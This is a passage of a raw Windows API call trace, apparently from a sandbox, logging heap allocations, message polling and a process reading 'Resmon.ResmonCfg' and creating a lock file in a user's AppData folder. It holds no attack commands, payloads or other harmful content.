wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.145] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.146] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Resmon.ResmonCfg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\resmon.resmoncfg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b0 [0200.147] SetFilePointerEx (in: hFile=0x4b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.147] SetFilePointerEx (in: hFile=0x4b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0200.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71e0 [0200.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0200.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0200.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0200.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0200.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0200.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0200.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0200.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0200.147] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0200.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0200.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0200.147] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0200.147] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0200.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0200.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0200.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0200.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0200.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0200.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0200.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0200.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0200.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0200.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0200.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0200.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0200.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0200.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0200.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0200.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0200.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0200.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0200.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0200.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0200.148] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/" (normalized: "c:\\users\\fd1hvy\\appdata\\local")) returned 0x10 [0200.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0200.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0200.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0200.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a138 [0200.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0200.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0200.149] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Lock.Resmon.ResmonCfg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\lock.resmon.resmoncfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ec [0200.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ee0 [0200.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0200.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0200.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0200.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0200.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0200.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0200.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0200.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0200.158] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0200.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0200.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0200.158] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0200.158] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0200.158] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0200.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0200.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0200.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0200.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0200.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0200.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0200.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0200.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0200.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0200.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0200.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0200.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0200.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0200.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0200.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0200.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0200.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0200.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0200.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0200.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0200.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0200.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0200.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0200.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0200.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0200.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0200.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0200.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0200.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0200.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0200.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50e7020 [0200.162] SetFilePointerEx (in: hFile=0x4b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0200.162] ReadFile (in: hFile=0x4b0, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x1db5, lpOverlapped=0x0) returned 1 [0200.166] ReadFile (in: hFile=0x4b0, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0200.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0200.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0200.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0200.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0200.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1db5) returned 0x2a9a140 [0200.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e7020 | out: hHeap=0x2af0000) returned 1 [0200.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0200.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0200.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0200.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0200.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0200.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0200.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0200.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0200.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1db5) returned 0x2a9bf00 [0200.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9a140 | out: hHeap=0x2af0000) returned 1 [0200.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0200.196] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0200.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0200.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0200.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0200.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0200.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1db5) returned 0x2a9a140 [0200.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0200.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9a140 | out: hHeap=0x2af0000) returned 1 [0200.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0200.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0200.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0200.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0200.220] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0200.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0200.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0200.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0200.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0200.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0200.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0200.221] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0200.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0200.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0200.221] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0200.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0200.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0200.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0200.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72298 [0200.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0200.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0200.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0200.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0200.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1db5) returned 0x2a9a140 [0200.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0200.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72388 [0200.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0200.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0200.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0200.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72228 [0200.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0200.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0200.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0200.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722a8 [0200.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0200.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0200.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0200.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa738 [0200.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0200.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0200.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0200.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0200.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0200.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0200.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0200.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1db5) returned 0x2a9dcc0 [0200.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0200.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0200.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0200.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0200.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0200.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0200.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0200.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0200.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0200.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0200.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0200.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0200.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0200.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0200.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0200.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0200.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0200.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0200.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0200.224] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0200.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0200.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0200.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0200.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0200.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0200.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0200.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0200.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0200.224] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0200.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0200.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0200.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0200.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0200.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0200.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0200.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0200.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0200.224] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0200.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0200.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0200.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0200.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0200.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0200.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0200.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0200.225] RtlAllocateHeap (HeapHandle=0x2af0000, 